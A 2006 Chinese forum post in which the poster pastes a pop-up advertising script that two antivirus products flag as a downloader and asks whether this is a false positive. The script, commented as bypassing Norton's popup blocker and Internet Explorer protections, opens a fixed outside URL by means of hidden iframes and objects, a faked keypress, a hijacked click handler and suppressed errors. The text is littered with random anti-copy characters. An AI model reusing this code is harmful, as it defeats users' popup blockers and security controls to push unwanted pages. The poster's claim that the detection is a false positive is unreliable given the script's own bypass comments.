各位幫我看看這段彈窗代碼,怎麼殺軟報毒,我覺得是誤報...
, q3 m$ f; s0 T0 h
7 I1 X+ J% O* M- F3 u7 T代碼如下.
. i; c5 n2 s( b* f2 O4 f* h- N2 B( D
: Y' C5 b. O/ k9 F1 `3 I/ |
* f( e+ ~) g5 u, ]! J: y<Script Language="JavaScript">
; _2 c* b, W4 L" tvar paypopupURL = "http://diaocha888.ik8.com/aonev.htm";& k8 f" t' G+ M2 |
var usingActiveX = true;5 m6 t2 Z0 d& ?& {
function blockError(){return true;}
- `% ]; \0 \0 _& q3 T* N6 `window.onerror = blockError;
# _, q/ o G; \//bypass norton internet security popup blocker# \4 _( _; P0 H# j4 n5 f" c& D
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}
/ t- B* ~9 B4 F8 Cif (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
; w. L; ]* T! _2 V0 k- w' }' uif (typeof(usingClick) == 'undefined') {var usingClick = false;}+ n0 J; R* I0 C
if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;}3 l2 J0 b+ a% v2 o
if (typeof(popwin) == 'undefined') {var popwin = null;}
* j% b# R2 e- Q: {2 r6 ]* x! Rif (typeof(poped) == 'undefined') {var poped = false;}. |3 P+ w1 R, a1 z' i
if (typeof(paypopupURL) == 'undefined') {var paypopupURL = "http://diaocha888.ik8.com/aonev.htm";}+ |# L# B# a% I3 s
var blk = 1;, ]3 x/ |5 |, M j$ q
var setupClickSuccess = false;
- k J$ w5 B# A0 Ivar googleInUse = false;
# V6 |$ c* `' Y' `# W/ ?; A* Yvar myurl = location.href+'/';1 D% K) R5 m; x( ^
var MAX_TRIED = 20;$ T# n" R/ a- v, {9 w
var activeXTried = false;8 r7 S1 t9 c O0 w) h- Q! G
var tried = 0;
( b1 ^! m& j* K) T/ d$ Kvar randkey = '�0'; // random key from server b& N% M( \/ I( R U# u
var myWindow;9 b* s+ r5 |9 O+ h3 j5 j& ]
var popWindow;
u: o9 j' J) {3 s" M) ivar setupActiveXSuccess = 0;
7 `- p5 y% a9 B! ^6 M" ~2 Q// bypass IE functions
( t' _! {; q/ Z3 s; Q: H8 \; ?function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('<INPUT STYLE="display:none;" ID="autoHit" TYPE="TEXT" ONKEYPRESS="showActiveX()">');popWindow=window.createPopup();popWindow.document.body.innerHTML='<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT></DIV>';document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" SRC="about:blank"></IFRAME>');popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT>');setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}
: f& l2 q, C4 k! i! I" Ofunction tryActiveX(){if (!activeXTried && !poped) {if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow) {myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;}else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow){myWindow=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace('about:blank');}else {setTimeout('tryActiveX()',200);tried++;if (tried >= MAX_TRIED && !activeXTried) {activeXTried = true;setupClick();}return;}openActiveX();window.windowFired=true;self.focus();}}
9 c) ~* W$ }! j" y8 M! t/ ~function openActiveX(){if (!activeXTried && !poped) {if (myWindow && window.windowFired){window.windowFired=false;document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));}else {setTimeout('openActiveX();',100);}tried++;if (tried >= MAX_TRIED) {activeXTried = true;setupClick();}}}
' `, K$ E' l6 v3 H3 u. ifunction showActiveX(){if (!activeXTried && !poped) {if (googleInUse) {window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);}newWindow=myWindow.open(paypopupURL,'abcdefg');if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}- S r- v' S& m9 X/ H9 V
// end bypass IE functions
- w( U$ ~( t B// normal call functions
E% V4 f; G: N" V. l6 Yfunction paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}
- j6 ^7 [) z5 O0 m3 P+ G! |// end normal call functions5 S6 }% W! s8 j9 J9 m4 C
// onclick call functions: Y: h7 `% ?3 l w, O' A
function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}8 t( c$ M8 b. |3 {* [5 V' \/ v
function gopop() {if (!poped) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}$ S1 i* b' w6 s) d% \# w6 ^; O
// end onclick call functions
, l. ^. c+ I" d/ M+ B5 T// check version
: v; I, \1 f- W, ?function detectGoogle() {if (usingActiveX) {try {document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}}+ Q7 P, i& y& \/ r7 B2 i
function version() {var os = 'W0';var bs = 'I0';var isframe = false;var browser = window.navigator.userAgent;if (browser.indexOf('Win') != -1) {os = 'W1';}if (browser.indexOf("SV1") != -1) {bs = 'I2';}else if (browser.indexOf("Opera") != -1) {bs = "I0";}else if (browser.indexOf("Firefox") != -1) {bs = "I0";}else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}if (top.location != this.location) {isframe = true;}paypopupURL = paypopupURL;usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();}8 t+ T1 e" e8 ]/ Y. M6 Z
version();
) i8 k. }3 z) p7 U+ [. t// end check version
) d2 J0 v& g5 Wfunction loadingPop() {/ `' J2 c4 p: y
if(!usingClick && !usingActiveX) {
* g+ Q0 V) ?2 \8 ]paypopup();
9 B5 [/ I) t K Z- \}
( S; `- x# f/ V! gelse if (usingActiveX) {tryActiveX();}$ E6 }! j& {! T' o. F( D. j
else {setupClick();}# {0 O, ]$ ]. w- K/ y
}
& u' Q, l5 v. z1 R1 K- bmyurl = myurl.substring(0, myurl.indexOf('/',8));
6 n5 d& \5 ?3 k. V( uif (myurl == '') {myurl = '.';} u$ v( n' l% I
setupActiveX();
( H( l5 d6 `- CloadingPop();6 Q0 ^' o- I8 S, Q- P; E' N
self.focus();
6 y0 R# J X" w# r- C8 }; x# e+ L</Script>
5 V$ O3 y% w# B' G# Y$ p' p# j4 `- V2 M$ u3 N" s
; S$ d/ [+ S% u; o* ^' v4 ~
' J7 g! d# C5 \& A* _4 W: Y( r我的卡巴和ewido全報,說是downloader.xx.xx 什麼的,我看了下代碼,覺得是誤報,大家覺得呢! |
|
發表於 2006-7-28 18:10:52
提升卡
沉默卡
变色卡